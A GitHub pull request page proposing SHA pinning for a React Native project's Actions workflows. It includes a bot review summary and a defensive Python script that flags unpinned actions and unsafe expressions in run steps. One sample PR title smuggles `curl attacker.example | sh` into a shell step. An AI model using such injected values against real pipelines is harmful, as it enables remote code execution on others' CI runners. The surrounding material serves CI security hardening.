
fix: harden GitHub Actions workflows #535

Closed

dagecko wants to merge 1 commit into reactnativecn:master from dagecko:runner-guard/fix-ci-security


Conversation


@dagecko dagecko commented Mar 30, 2026

Re-submission of #529. Had a problem with my fork and had to delete it, which closed the original PR. Apologies for the noise.

Summary

This PR pins all GitHub Actions to immutable commit SHAs instead of mutable version tags and extracts any unsafe expressions from run blocks into env mappings.

How to verify

Review the diff; each change is mechanical and preserves workflow behavior:

  • SHA pinning: action@v3 becomes action@abc123 # v3, original version preserved as comment
  • No workflow logic, triggers, or permissions are modified

I've been researching CI/CD supply chain attack vectors and submitting fixes to affected repos. Based on that research I built a scanner called Runner Guard and open-sourced it here so you can scan yourself if you want to. I'll be posting more advisories over the next few weeks on Twitter if you want to stay in the loop.

If you have any questions, reach out. I'll be monitoring comms.

- Chris (dagecko)

Summary by CodeRabbit

  • Chores
    • Updated continuous integration workflow configurations to use pinned action versions for improved stability and security across testing, linting, and publishing pipelines.
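The two hardening points this PR describes, mutable action refs and untrusted event data interpolated straight into `run:` scripts, are easy to check for mechanically. The script below is an added example written for this page; it is not Runner Guard and not this repository's code. It works on the raw workflow text with regular expressions (no PyYAML needed), and the two embedded workflows are constructed samples: the setup-bun SHA is the one this PR pins to, while the `actions/checkout` SHA in the hardened sample is a 40-zero placeholder, not a real commit. The list of untrusted expression prefixes is illustrative, not exhaustive.

```python
"""Heuristic audit of GitHub Actions workflow text for two hardening points:
action refs that are mutable tags/branches instead of commit SHAs, and
untrusted event data interpolated directly into `run:` scripts.
Added example; not Runner Guard and not this repository's code."""
import re

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
# `- uses: owner/repo@ref   # optional comment`
USES_RE = re.compile(r"^\s*(?:-\s+)?uses:\s*([^\s#@]+)@([^\s#]+)")
# `run:` with an optional YAML block indicator (| or >, with chomping)
RUN_RE = re.compile(r"^(\s*)(?:-\s+)?run:\s*([|>][-+]?)?\s*(.*)$")
EXPR_RE = re.compile(r"\$\{\{\s*([^}]*?)\s*\}\}")

# Expression prefixes an outside contributor can control (PR title/body,
# branch name, commit message, issue/comment text). Illustrative, not exhaustive.
UNTRUSTED_PREFIXES = (
    "github.event.pull_request.",
    "github.event.issue.",
    "github.event.comment.",
    "github.event.head_commit.",
    "github.event.review.",
    "github.head_ref",
)


def is_untrusted(expr):
    return expr.strip().startswith(UNTRUSTED_PREFIXES)


def _indent(line):
    return len(line) - len(line.lstrip())


def audit_workflow(text):
    """Return (kind, line_no, detail) tuples; kind is 'unpinned' or 'unsafe-expr'."""
    findings = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        m = USES_RE.match(line)
        if m:
            action, ref = m.groups()
            # Local ./ actions have no @ and are skipped; docker:// image
            # digests (sha256:...) are not special-cased by this heuristic.
            if not SHA_RE.match(ref):
                findings.append(("unpinned", i + 1, f"{action}@{ref}"))
            i += 1
            continue
        m = RUN_RE.match(line)
        if m:
            indent, block, inline = m.groups()
            run_line = i + 1
            script = [inline]
            i += 1
            if block:  # literal/folded scalar: body is every following line indented deeper
                while i < len(lines) and (not lines[i].strip() or _indent(lines[i]) > len(indent)):
                    script.append(lines[i])
                    i += 1
            # Expressions are substituted into the script text before the shell
            # runs it, so untrusted values here become shell syntax.
            for expr in EXPR_RE.findall("\n".join(script)):
                if is_untrusted(expr):
                    findings.append(("unsafe-expr", run_line, expr))
            continue
        i += 1
    return findings


# Constructed sample: the shape of a workflow before this kind of fix.
BEFORE = """\
name: ci
on: pull_request
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: oven-sh/setup-bun@v2
      - name: Announce
        run: |
          echo "Testing PR: ${{ github.event.pull_request.title }}"
          bun test
"""

# Constructed sample: the same workflow hardened. The setup-bun SHA is the one
# this PR uses; the checkout SHA is a 40-zero placeholder, not a real commit.
AFTER = """\
name: ci
on: pull_request
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0000000000000000000000000000000000000000 # v4 (placeholder)
      - uses: oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6 # v2
      - name: Announce
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "Testing PR: $PR_TITLE"
          bun test
"""

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after", AFTER)):
        print(f"{label}: {audit_workflow(text) or 'no findings'}")
```

On the `BEFORE` sample the audit reports both unpinned `uses:` lines and the `run:` block that interpolates `github.event.pull_request.title`; a PR title such as `"; curl attacker.example | sh; echo "` would be pasted into that script verbatim before bash ever sees it. The `AFTER` sample produces no findings: the value now reaches the step only as the environment variable `PR_TITLE`, which bash treats as data (keep it double-quoted, as shown, so it is not word-split), and the actions are pinned to full commit SHAs with the original tag preserved in a trailing comment so the pin stays readable and updatable.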


coderabbitai bot commented Mar 30, 2026

No actionable comments were generated in the recent review. 🎉

ℹ️ Recent review info
⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro

Run ID: f2295b73-3043-4c33-a959-34e0ff55a130

📥 Commits

Reviewing files that changed from the base of the PR and between 1e1a4ad and 5b3c678.

📒 Files selected for processing (5)
  • .github/workflows/e2e_android.yml
  • .github/workflows/e2e_ios.yml
  • .github/workflows/lint.yml
  • .github/workflows/publish.yml
  • .github/workflows/test.yml

📝 Walkthrough

Walkthrough

GitHub Actions workflows across the repository are updated to pin action versions to specific commit SHAs instead of using floating version tags (v1, v2), ensuring reproducible CI/CD builds by locking Bun, Android emulator, and Xcode setup actions to exact versions.

Changes

  • Bun Setup Action Pinning
    Files: .github/workflows/e2e_android.yml, .github/workflows/e2e_ios.yml, .github/workflows/lint.yml, .github/workflows/publish.yml, .github/workflows/test.yml
    Summary: oven-sh/setup-bun@v2 pinned to commit SHA 0c5077e51419868618aeaa5fe8019c62421857d6 in all five workflows, with the original version kept as an inline comment.
  • Other CI/CD Action Pinning
    Files: .github/workflows/e2e_android.yml, .github/workflows/e2e_ios.yml
    Summary: reactivecircus/android-emulator-runner@v2 and maxim-lobanov/setup-xcode@v1 pinned to specific commit SHAs to lock the action versions.

Poem

🐰 Floating tags we've left behind,
Commit hashes, firmly pinned!
Builds reproducible, workflows refined,
Certainty in every CI bind!

Estimated code review effort

🎯 1 (Trivial) | ⏱️ ~3 minutes

🚥 Pre-merge checks: 3 passed

  • Description Check: ✅ Passed. Check skipped because CodeRabbit's high-level summary is enabled.
  • Title check: ✅ Passed. The title 'fix: harden GitHub Actions workflows' clearly and specifically describes the main objective of the changeset, pinning GitHub Actions to commit SHAs to improve security.
  • Docstring Coverage: ✅ Passed. No functions found in the changed files to evaluate docstring coverage; check skipped.


@sunnylqm sunnylqm closed this Mar 31, 2026